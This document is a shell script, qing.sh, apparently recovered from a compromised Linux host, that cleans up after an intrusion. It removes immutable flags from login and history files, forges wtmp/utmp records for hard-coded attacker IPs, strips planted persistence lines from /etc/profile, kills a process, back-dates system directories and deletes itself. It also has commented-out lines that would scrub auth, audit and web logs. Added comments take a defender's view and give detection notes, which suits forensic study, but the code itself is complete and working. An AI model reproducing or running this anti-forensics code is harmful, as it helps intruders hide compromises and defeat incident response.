文件名
qing.sh
代码如下
#!/bin/bash
# qing.sh — post-intrusion log-cleaning routine (anti-forensics).
#
# Reading this from a defender's side, the script does five things in a
# fixed order: deletes itself and a sibling script, strips the immutable
# attribute from login/history files, rewrites login records (wtmp/utmp)
# through an external tool called `nl-addr`, removes persistence lines
# from /etc/profile, and back-dates timestamps on system directories.
# It then prints recent shell history and `last` output so the operator
# can check the clean-up by eye.
#
# Detection / mitigation notes (everything below is taken from the
# commands on this page):
#   - `chattr -i` on /var/log/wtmp or on a .bash_history file is not a
#     normal admin action; an auditd rule on the chattr syscall path or
#     file-integrity monitoring on /var/log/wtmp will surface it.
#   - Paths that the script references and that do not exist on a stock
#     system: /tmp/.font-unix/so.bak, /usr/local/sbin/jon, /usr/lib/ps,
#     /usr/lib/rpm/rpm, /usr/lib/apt/apt, and the `nl-addr` binary.
#   - The four host/IP constants below are the only hard-coded values
#     the script matches logins against.
#   - Because wtmp/utmp are rewritten locally, only login records that
#     were already forwarded off-host (remote syslog / journald upload)
#     remain trustworthy after this has run.
#
# The script assumes root (it edits /etc/profile, /var/log/wtmp and
# /run/utmp and kills arbitrary PIDs).
#
# Self-deletion: the page names this file qing.sh; a sibling
# "hide_centos7*.sh" is removed as well.
rm -f qing.sh*
rm -f hide_centos7*.sh*
# user2: the first non-root, non-system login name from `last -a`;
# user3: the next one after excluding user2. Note that $user2 is
# interpolated unquoted into the grep alternation, so if user2 is empty
# the pattern contains an empty alternative and matches every line,
# leaving user3 empty as well (observed from the pattern, not tested).
user2=$(last -a | grep -v "root\|reboot\|system\|boot"|sed -n '1p' | awk '{print $1}')
user3=$(last -a | grep -v "root\|reboot\|$user2\|system\|boot"|sed -n '1p' | awk '{print $1}')
# Drop the immutable bit so the login log and shell histories become
# writable again, then remove two leftover artifacts (a backup under
# /tmp/.font-unix and /usr/local/sbin/jon). /home/$user2 is unquoted.
chattr -i /var/log/wtmp ; chattr -i /root/.bash_history ; chattr -i /home/$user2/.bash_history ; rm -f /tmp/.font-unix/so.bak ;rm -f /usr/local/sbin/jon ;
# Hosts/IPs the operator logged in from. Only logins whose host column
# equals one of these is touched by the nl-addr block below.
ipset4='mysql1'
ipset3='18.162.213.72'
ipset2='localhost'
ipset='43.154.131.34'
# Most recent login: $10 of `last -a` (presumably the host, which -a moves
# to the end of the line — TODO confirm for this `last` build), $1 the
# user, $3 of plain `last` the host. `ip` is assigned but never read
# further down the page.
ip=$(last -a |sed -n '1p' | awk '{print $10}')
user=$(last -a |sed -n '1p' | awk '{print $1}')
tip=$(last |sed -n '1p' | awk '{print $3}')
# Timestamp of the last wtmp entry as reported by `who`, converted to
# epoch seconds and back to a colon-separated date string; this is the
# value later written into the fabricated record (see nl-addr -m).
time=$(who /var/log/wtmp | sed -n '$p' | awk '{print $3,$4}' )
sjc=$(date -d "$time" +%s)
riqi=$(date -d @$sjc "+%Y:%m:%d:%H:%M:%S")
# `nl-addr` is not a standard utility and is not shown on this page; from
# its flags (-w, -u, -f FILE, -m) it appears to be a utmp/wtmp record
# editor — TODO confirm. Each block runs it against the default file,
# then explicitly against /var/log/wtmp and /run/utmp, for the login
# whose host matches one of the constants above. All expansions are
# unquoted.
if [[ $tip = $ipset ]]; then
nl-addr -w $user $ipset
nl-addr -f /var/log/wtmp -w $user $ipset
nl-addr -u $user $ipset
nl-addr -f /run/utmp -u $user $ipset
fi
if [[ $tip = $ipset2 ]]; then
nl-addr -w $user $ipset2
nl-addr -f /var/log/wtmp -w $user $ipset2
nl-addr -u $user $ipset2
nl-addr -f /run/utmp -u $user $ipset2
fi
if [[ $tip = $ipset3 ]]; then
nl-addr -w $user $ipset3
nl-addr -f /var/log/wtmp -w $user $ipset3
nl-addr -u $user $ipset3
nl-addr -f /run/utmp -u $user $ipset3
fi
if [[ $tip = $ipset4 ]]; then
nl-addr -w $user $ipset4
nl-addr -f /var/log/wtmp -w $user $ipset4
nl-addr -u $user $ipset4
nl-addr -f /run/utmp -u $user $ipset4
fi
# tip3 is never used; time2 is only referenced by the commented-out sed
# line below. Both are dead on this page.
tip3=$(last |sed -n '1p' | awk '{print $3}')
time2=$(who /var/log/wtmp | sed -n '$p' | awk '{print $3}' )
# Disabled log-scrubbing lines (dpkg, secure, audit, web access log,
# messages, auth.log). They are kept as-is; their presence lists the
# log files the author considered worth watching.
#sed -i '/'$time2'/d' /var/log/dpkg.log* ;
#sed -i '/'$ipset'/d' /var/log/secure* ;
#sed -i '/'$ipset'/d' /var/log/audit/audit.* ;
#sed -i '/'$ipset'/d' /www/wwwlogs/access.* ;
#sed -i '/'error:'/d' /var/log/messages ;
#sed -i '/'systemd-logind:'/d' /var/log/messages ;
#sed -i '/'$ipset'/d' /var/log/auth.log* ;
#sed -i '/'kernel-'/d' /var/log/messages* ;
#sed -i '/'ipaddr:'/d' /var/log/messages* ;
# Kill every process whose command line contains "rpm.sh". Note the
# non-standard /usr/lib/ps path — likely a copied ps binary, so a
# missing /usr/lib/ps on a clean host is expected. Output is discarded.
kill -9 $(/usr/lib/ps -ef | grep rpm.sh | grep -v grep | awk '{print $2}') >/dev/null 2>&1
#kill -9 $(ps -ef | grep sftp-server | grep -v grep | awk '{print $2}') >/dev/null 2>&1
cd /etc
# Build sed address patterns for persistence lines previously planted in
# /etc/profile: "ls | grep" (+3 following lines), "chmod +x /usr/lib/"
# (+2), "setsid /usr/lib/rpm/rpm" (+1) and "setsid /usr/lib/apt/apt"
# (+1). Slashes are escaped as \/ so they survive inside the sed
# address; `ls` here is a shell variable, not the command. Errors from
# sed (e.g. missing file) are silenced.
pro="chmod +x /usr/lib/"
ls="ls | grep"
pro=${pro//\//\\\/}
sid="setsid /usr/lib/rpm/rpm"
sid=${sid//\//\\\/}
sid2="setsid /usr/lib/apt/apt"
sid2=${sid2//\//\\\/}
sed -i '/'"$ls"'/,+3d' /etc/profile >/dev/null 2>&1
sed -i '/'"${pro}"'/,+2d' /etc/profile >/dev/null 2>&1
sed -i '/'"${sid}"'/,+1d' /etc/profile >/dev/null 2>&1
sed -i '/'"${sid2}"'/,+1d' /etc/profile >/dev/null 2>&1
# Timestomping. `touch -r` takes a single reference file, so after the
# glob expands the first /etc entry becomes the reference and every
# remaining /etc entry plus the named directory is set to its times
# (GNU touch behaviour — TODO confirm). A forensic side effect is that
# many /etc entries end up sharing one identical mtime/atime, which is
# itself an anomaly worth alerting on.
touch -r /etc/* /usr/lib
touch -r /etc/* /usr/
touch -r /etc/* /usr/bin
touch -r /etc/* /usr/sbin
touch -r /etc/* /bin
touch -r /etc/* /tmp/.font-unix
# Append a replacement login record (nl-addr -m) for $user on tty1 dated
# $riqi, from the most recent host or "localhost" when none is present.
# The command line is echoed for the operator.
tip2=$(last |sed -n '1p' | awk '{print $3}')
if [[ "$tip2" = "" ]]; then
nl-addr -m $user localhost tty1 $riqi
echo nl-addr -m $user localhost tty1 $riqi
else
nl-addr -m $user $tip2 tty1 $riqi
echo nl-addr -m $user $tip2 tty1 $riqi
fi
# Verification output for the operator: last 5 lines of root's history,
# then of up to four other users' histories. The banner text says
# /root/$userN but the file read is /home/$userN/.bash_history.
echo
echo 这里查看/root/.bash_history操作记录中有没有自己的记录---------------------------最近5条
echo
cat /root/.bash_history |tail -n 5
echo
# user2/user3 are recomputed here with the same pipelines as at the top.
user2=$(last -a | grep -v "root\|reboot\|system\|boot"|sed -n '1p' | awk '{print $1}')
if [[ $user2 != "" ]]; then
echo 这里查看/root/$user2 的用户操作记录---------------------------------------------最近5条
cat /home/$user2/.bash_history |tail -n 5
fi
echo
user3=$(last -a | grep -v "root\|reboot\|$user2\|system\|boot"|sed -n '1p' | awk '{print $1}')
if [[ $user3 != "" ]]; then
echo 这里查看/root/$user3 的用户操作记录---------------------------------------------最近5条
cat /home/$user3/.bash_history |tail -n 5
fi
echo
user4=$(last -a | grep -v "root\|reboot\|$user2\|$user3\|system\|boot"|sed -n '1p' | awk '{print $1}')
if [[ $user4 != "" ]]; then
echo 这里查看/root/$user4 的用户操作记录---------------------------------------------最近5条
cat /home/$user4/.bash_history |tail -n 5
fi
user5=$(last -a | grep -v "root\|reboot\|$user2\|$user3\|$user4\|system\|boot"|sed -n '1p' | awk '{print $1}')
if [[ $user5 != "" ]]; then
echo 这里查看/root/$user5 的用户操作记录---------------------------------------------最近5条
cat /home/$user5/.bash_history |tail -n 5
fi
# Show the three most recent login records after the edits above.
echo 这里是查看last的最新登录ip是不是别人的---------------------------------------显示前三条登录记录
last -a | head -n 3
echo
ps aux | grep "12:9\|7:8\|7:9" | grep -v grep
|